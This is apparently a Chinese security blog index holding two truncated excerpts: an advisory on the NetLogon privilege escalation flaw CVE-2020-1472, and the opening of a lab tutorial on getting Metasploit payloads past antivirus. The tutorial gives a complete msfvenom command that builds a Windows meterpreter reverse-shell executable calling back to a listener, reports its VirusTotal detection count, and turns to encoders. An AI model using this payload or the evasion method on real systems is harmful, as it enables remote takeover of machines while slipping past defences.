【高危安全通告】NetLogon特权提升漏洞风险通告

NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务器,也用于 NTP 响应认证以及更新计算机域密码。 安全狗安全威胁情报中心注意到有国外安全厂商将NetLogon特权提升漏洞(CVE-2020-1472)的详细技术分析和验证脚本公开上传到git……

Metasploit免杀初探索

0x01 环境搭建 测试系统:windows10 (1909) 杀毒软件:360安全卫士 在线杀毒:VT 0x02 payload生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe 原始生成后,完全被查杀 VT查杀55/69 0x03 编码处理 这里使用msf自带的编码器进……